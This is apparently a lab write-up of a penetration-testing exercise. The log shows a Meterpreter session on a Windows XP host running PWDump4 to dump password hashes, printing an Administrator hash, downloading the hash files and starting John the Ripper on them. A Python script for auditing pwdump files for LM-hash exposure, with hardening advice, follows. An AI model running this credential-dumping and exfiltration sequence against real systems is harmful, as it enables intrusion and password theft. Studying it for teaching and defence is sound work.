[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]

meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

meterpreter> use -m Process
loadlib: Loading library from 'ext285386.dll' on the remote machine.
meterpreter> loadlib: success.
meterpreter> use -m Fs
loadlib: Loading library from 'ext821455.dll' on the remote machine.
meterpreter> loadlib: success.
meterpreter> help

Core         Core feature set commands
------------ ----------------
read         Reads from a communication channel
write        Writes to a communication channel
close        Closes a communication channel
interact     Switch to interactive mode with a channel
help         Displays the list of all register commands
exit         Exits the client
initcrypt    Initializes the cryptographic subsystem

Extensions   Feature extension commands
------------ ----------------
loadlib      Loads a library on the remote endpoint
use          Uses a feature extension module

Process      Process manipulation and execution commands
------------ ----------------
execute      Executes a process on the remote endpoint
kill         Terminate one or more processes on the remote endpoint
ps           List processes on the remote endpoint

File System  File system interaction and manipulation commands
------------ ----------------
cd           Change working directory.
getcwd       Get the current working directory.
ls           List the contents of a directory.
upload       Upload one or more files to a remote directory.
download     Download one or more files from a remote directory.

meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter> execute: success, process id is 320.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter> interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is ECC2-88FC

 Directory of C:\

07/27/2004  09:21 PM                 0 AUTOEXEC.BAT
07/27/2004  09:21 PM                 0 CONFIG.SYS
07/27/2004  09:54 PM                   cs301
01/07/2007  12:23 AM                   Documents and Settings
03/05/2007  10:59 PM           229,376 plink.exe
01/07/2007  12:20 AM                   Program Files
03/05/2007  11:20 PM             4,608 PWDump4.dll
03/05/2007  11:19 PM            16,384 PWDump4.exe
03/05/2007  11:20 PM                 0 PWDupm4.dll
03/05/2007  10:58 PM           308,736 wget.exe
03/05/2007  11:09 PM                   WINDOWS
               7 File(s)        559,104 bytes
               4 Dir(s)  15,457,337,344 bytes free

C:\>delete PWDupm4.dll
delete PWDupm4.dll
'delete' is not recognized as an internal or external command,
operable program or batch file.

C:\>del PWDupm4.dll
del PWDupm4.dll

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is ECC2-88FC

 Directory of C:\

07/27/2004  09:21 PM                 0 AUTOEXEC.BAT
07/27/2004  09:21 PM                 0 CONFIG.SYS
07/27/2004  09:54 PM                   cs301
01/07/2007  12:23 AM                   Documents and Settings
03/05/2007  10:59 PM           229,376 plink.exe
01/07/2007  12:20 AM                   Program Files
03/05/2007  11:20 PM             4,608 PWDump4.dll
03/05/2007  11:19 PM            16,384 PWDump4.exe
03/05/2007  10:58 PM           308,736 wget.exe
03/05/2007  11:09 PM                   WINDOWS
               6 File(s)        559,104 bytes
               4 Dir(s)  15,457,337,344 bytes free

C:\>PWDump4
PWDump4
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.

Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]
  [Target]        -- Target Computer's ip or name to work,
  [/l]            -- works on local Computer.
  [/s:share]      -- Share used to copy files instead of Admin$.
  [/o:outputFile] -- Result filename for output.
  [/u:userName]   -- UserName used to connect, provide password later.
  [/r[:newname]]  -- Rename the files to 'newname' when copy to the target,
                     rename service name also, see FAQ for more.

C:\>PWDump4 /l /o:passwd.txt
PWDump4 /l /o:passwd.txt
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
SRV>Version: OS Ver 5.1, , Workstation

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is ECC2-88FC

 Directory of C:\

07/27/2004  09:21 PM                 0 AUTOEXEC.BAT
07/27/2004  09:21 PM                 0 CONFIG.SYS
07/27/2004  09:54 PM                   cs301
01/07/2007  12:23 AM                   Documents and Settings
03/05/2007  11:34 PM                88 passwd.txt
03/05/2007  10:59 PM           229,376 plink.exe
01/07/2007  12:20 AM                   Program Files
03/05/2007  11:20 PM             4,608 PWDump4.dll
03/05/2007  11:19 PM            16,384 PWDump4.exe
03/05/2007  10:58 PM           308,736 wget.exe
03/05/2007  11:09 PM                   WINDOWS
               7 File(s)        559,192 bytes
               4 Dir(s)  15,457,329,152 bytes free

C:\>vi passwd.txt
vi passwd.txt
'vi' is not recognized as an internal or external command,
operable program or batch file.

C:\>cat passwd.txt
cat passwd.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\>more passwd.txt
more passwd.txt
Administrator:500:626309417146BFFDAAD3B435B51404EE:C136578936200A5DDAB03847745758F7:::

C:\>PWDump4
PWDump4
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.

Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]
  [Target]        -- Target Computer's ip or name to work,
  [/l]            -- works on local Computer.
  [/s:share]      -- Share used to copy files instead of Admin$.
  [/o:outputFile] -- Result filename for output.
  [/u:userName]   -- UserName used to connect, provide password later.
  [/r[:newname]]  -- Rename the files to 'newname' when copy to the target,
                     rename service name also, see FAQ for more.

C:\>PWDump4 /l /o:pw.txt
PWDump4 /l /o:pw.txt
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
SRV>Version: OS Ver 5.1, , Workstation

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is ECC2-88FC

 Directory of C:\

07/27/2004  09:21 PM                 0 AUTOEXEC.BAT
07/27/2004  09:21 PM                 0 CONFIG.SYS
07/27/2004  09:54 PM                   cs301
01/07/2007  12:23 AM                   Documents and Settings
03/05/2007  11:34 PM                88 passwd.txt
03/05/2007  10:59 PM           229,376 plink.exe
01/07/2007  12:20 AM                   Program Files
03/05/2007  11:42 PM               169 pw.txt
03/05/2007  11:20 PM             4,608 PWDump4.dll
03/05/2007  11:19 PM            16,384 PWDump4.exe
03/05/2007  10:58 PM           308,736 wget.exe
03/05/2007  11:09 PM                   WINDOWS
               8 File(s)        559,361 bytes
               4 Dir(s)  15,456,821,248 bytes free

C:\>

C:\>exit
exit
interact: Ending interactive session.
meterpreter> download c:\pw.txt /pentest
download: Starting download from 'c:\pw.txt' to '/pentest/pw.txt'...
download: 1 downloads started.
meterpreter> download: Download to '/pentest/pw.txt' succeeded.
meterpreter> download c:\passwd.txt /pentest
download: Starting download from 'c:\passwd.txt' to '/pentest/passwd.txt'...
download: 1 downloads started.
meterpreter> download: Download to '/pentest/passwd.txt' succeeded.
meterpreter> quit
[cs591@viva pentest]$ password/john-1.7.2/run/john pw.txt
password/john-1.7.2/run/john: error while loading shared libraries: libcrypto.so.0: cannot open shared object file: No such file or directory
[cs591@viva pentest]$ john pw.txt
Loaded 2 passwords with no different salts (NT LM DES [24/32 4K])
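The pwdump line shown above has the form user:RID:LM hash:NT hash:::, and a defender who receives such a dump from an authorized audit can read two things off it without cracking anything: whether an LM hash is stored at all, and, if it is, whether the second half of it equals the well-known empty-half constant AAD3B435B51404EE, which means the password is at most seven characters (that is the case for the Administrator line above). The following is an added example, not part of this lab and not code from PWDump4 or John the Ripper; it parses pwdump-format lines with the Python standard library only and reports those two conditions plus an empty-password NT hash. Only the Administrator line in the sample is from the session; the Guest and svc_backup lines are constructed.

```python
"""Audit pwdump-style hash dumps (user:rid:lmhash:nthash:::) for LM-hash exposure.

Added example for this lab write-up; not part of PWDump4 or John the Ripper.
"""
import re
from dataclasses import dataclass

# DES("KGS!@#$%") under an all-zero 7-byte key: the LM half produced for an
# empty (padded) password half. Well-known constant.
EMPTY_LM_HALF = "AAD3B435B51404EE"
# LM hash of the empty password: both halves are the empty-half constant.
EMPTY_LM_HASH = EMPTY_LM_HALF * 2
# NT hash of the empty password: MD4 of the empty UTF-16LE string. Well-known constant.
EMPTY_NT_HASH = "31D6CFE0D16AE931B73C59D7E0C089C0"

# user : rid : 32 hex LM : 32 hex NT : trailing fields (pwdump leaves them empty, ":::")
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32}):(.*)$")


@dataclass
class HashRecord:
    user: str
    rid: int
    lm_hash: str   # upper-case hex
    nt_hash: str   # upper-case hex


def parse_pwdump_line(line):
    """Return a HashRecord for one pwdump line, or None if the line is not in that format."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    return HashRecord(m.group(1), int(m.group(2)), m.group(3).upper(), m.group(4).upper())


def audit_record(rec):
    """Return the list of findings for one record, in a fixed order."""
    findings = []
    if rec.nt_hash == EMPTY_NT_HASH:
        findings.append("empty password")
    if rec.lm_hash == EMPTY_LM_HASH:
        # Host has NoLMHash in effect, or the password is 15+ characters.
        findings.append("LM hash not stored")
    else:
        findings.append("LM hash stored")
        if rec.lm_hash[16:] == EMPTY_LM_HALF:
            # Second DES block came from a zero-padded half: the password fits in 7 chars.
            findings.append("password is 7 characters or fewer")
    return findings


def audit_dump(text):
    """Parse every pwdump line in `text` and return {user: [findings]}.

    Lines that do not match the pwdump format (banners, blank lines) are skipped.
    """
    results = {}
    for line in text.splitlines():
        rec = parse_pwdump_line(line)
        if rec is None:
            continue
        results[rec.user] = audit_record(rec)
    return results


# Constructed sample dump. The Administrator line is the one printed by
# "more passwd.txt" in the session above; the other two lines are made up.
SAMPLE_DUMP = """\
Administrator:500:626309417146BFFDAAD3B435B51404EE:C136578936200A5DDAB03847745758F7:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
svc_backup:1005:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
"""

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(f"{user}: {', '.join(findings)}")
```

Either LM finding maps to a hardening step on the host: enable the NoLMHash policy (or use passwords of 15 or more characters, which Windows does not store as LM) so that only the NT hash remains, and enforce a minimum password length so that the seven-character half-hash shortcut no longer applies.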
Author: Edward Chow